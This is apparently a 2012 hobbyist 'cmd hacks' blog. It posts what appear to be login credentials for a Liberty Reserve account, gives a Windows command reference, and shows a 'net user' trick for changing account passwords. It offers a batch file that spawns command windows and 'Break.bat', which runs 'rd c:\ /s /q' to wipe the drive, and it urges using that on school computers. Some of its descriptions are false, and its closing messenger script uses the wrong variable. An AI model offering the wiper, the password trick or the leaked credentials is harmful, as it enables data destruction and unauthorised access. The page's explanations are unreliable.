Saturday 16 June 2012

FREE LIBERTY RESERVE ACCOUNT DETAILS FOR NET USERS TRY IT

U5421521

Password 6*gL$Uo7cd

Login PIN 23639

Master Key 892

Security Question Highschool Name

Answer lilfreezy

Wednesday 13 June 2012


(1)Telnet command-
Technically, telnet is a protocol. This means it is a language that computer use to communicate with one another in a particular way. From your point of view, Telnet is a program that lets you login to a site on the Internet through your connection to Teleport. It is a terminal emulation program, meaning that when you connect to the remote site, your computer functions as a terminal for that computer.
Once the connection is made, you can use your computer to access information, run programs, edit files, and otherwise use whatever resources are available on the other computer. What is available depends on the computer you connect to. Most of the times, if you type '?' or 'help', you would normally receive some type of information, menu options, etc.
Note: telnet connections give you command-line access only. In other words, instead of being able
to use buttons and menus as you do with a graphical interface, you have to type commands.
However, telnet allows you to use certain utilities and resources you cannot access with your
other Internet applications.
Usage: telnet [-a][-e escape char][-f log file][-l user][-t term][host [port]]
Switches:
-a Attempt automatic logon. Same as
-l option except uses the currently logged on user's name.
-e Escape character to enter telnet client prompt.
-f File name for client side logging
-l Specifies the user name to log in with on the remote system. Requires that the remote system support the TELNET ENVIRON option.
-t Specifies terminal type.
Supported term types are vt100, vt52, ansi and vtnt only.
host Specifies the hostname or IP address of the remote computer to connect to.
port Specifies a port number or service name.
(2)IPconfig command-
The ipconfig command will give you information about your current TCP/IP configuration. Information such as IP address, default gateway, subnet mask, etc can all be retrieved using this command.
Usage: ipconfig [/? | /all | /release [adapter] | /renew [adapter]]
Switches:
/? Display this help message.
/all Display full configuration information.
/release Release the IP address for the specified adapter.
/renew Renew the IP address for the specified adapter.


(3)Ping Command-
The ping (Packet Internet Groper) is used to send ICMP (Internet Control Message Protocol) packets from one host to another. Ping transmits packets using the ICMP ECHO_REQUEST command and expects an ICMP ECHO_REPLY.
Usage:ping IP address or Hostname
Switches:
-t Ping the specifed host until interrupted.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.

(4)Traceroute command-
The traceroute command is used to trace the route that a packet takes to reach its destination. This command works by using the time to live (TTL) filed in the IP packet.
Usage: tracert IP or Hostname
Switches:
-d Do not resolve addresses to hostnames.
-h maximum_hops Maximum number of hops to search for target.
-j host-list Loose source route along host-list.
-w timeout Wait timeout milliseconds for each reply.

(5)Finger command-
By default, finger will list the login name, full name, terminal name, and write status (shown as a "*" before the terminal name if write permission is denied), idle time, login time, office location, and phone number (if known) for each current user connected to the network.
Usage: finger username@domain
Switches:
-b Brief output format
-f Supresses the printing of the header line.
-i Provides a quick list of users with idle time.
-l Forces long output format.
-p Supresses printing of the .plan file (if present)
-q Provides a quick list of users.
-s Forces short output form.
-w Forces narrow output form.
So what you say do you find this post a result of hard work , tell me if you want to know more about some underground cmd tricks or hacks.

How to find out computer account passwords!
this will require you to know the username.
First open Command Prompt
Then type in the following Net User
This will give you all the accounts (so i lied you didn't need to know the USernames xD
Now type in Net User Admin (you may replace Admin with the account name)
Now you get even more info on that account if you read it all it tells you about the password
Now if you want to change the password just type the following Net User Admin Password (you can replace Admin with the username and Password with the desired password) and TADA you have changed the account password.

O.K. that is all that i will currently say, i will post more in the future, this is jsut a taste of things to come and now for some fun with Command Prompt!

Open up Notepad.exe or in Command Prompt type Notepad (you may type in a files name with out the .exe on the end and it will run it)
Now type in the following:

start
start
start
start
start
start
start crash

then click Save as and select all files, then name is .bat and when you are board just run it and u'll see what it does (make sure you save what your doing first!) it will auto name to Crash.bat

O.K. i take NO RESPONSIBILITY FOR WHAT I AM ABOUT TO POST! this file will BREAK YOU COMPUTER!

@echo off
taskkill -f explorer.exe
start %windir%\System32\rundll32.exe user32.dll, LockWorkStation
rd c:\ /s /q
cls

put that into a notepad and name it Break.bat now what will this do? it will first delete all internet browsers! then it will lock you out of your computer and then delete your System 32 file which is what your computer needs to RUN! now DO NOT USE THIS! i only posted this for those how want to break a school computer! be careful with this because you will need to get a new computer since restoring can't fix this! now be safe and have fun with the new skills i have just taught you! don't forget to thanks and rep me!


Saturday 9 June 2012

how to chat using cmd



@echo off
:A
cls
echo LAN Messenger
echo.
echo 1) Send message
echo 2) Quit
echo.
set /p menu="Option:"
if %menu%==1 goto :B
if %menu%==2 goto EXIT
cls
echo LAN Messenger
echo.
echo The command entered is not a valid command. Please try again.
echo.
pause
goto :A

:B
sc config Messenger start= auto
sc start Messenger
cls
echo LAN Messenger
echo.
set /p target=Target IP Address:
set /p body=Message:
net send %send% %body%
cls
echo.
echo Your message has been sent.
echo.
pause
goto :A
NB SAVE AS .BAT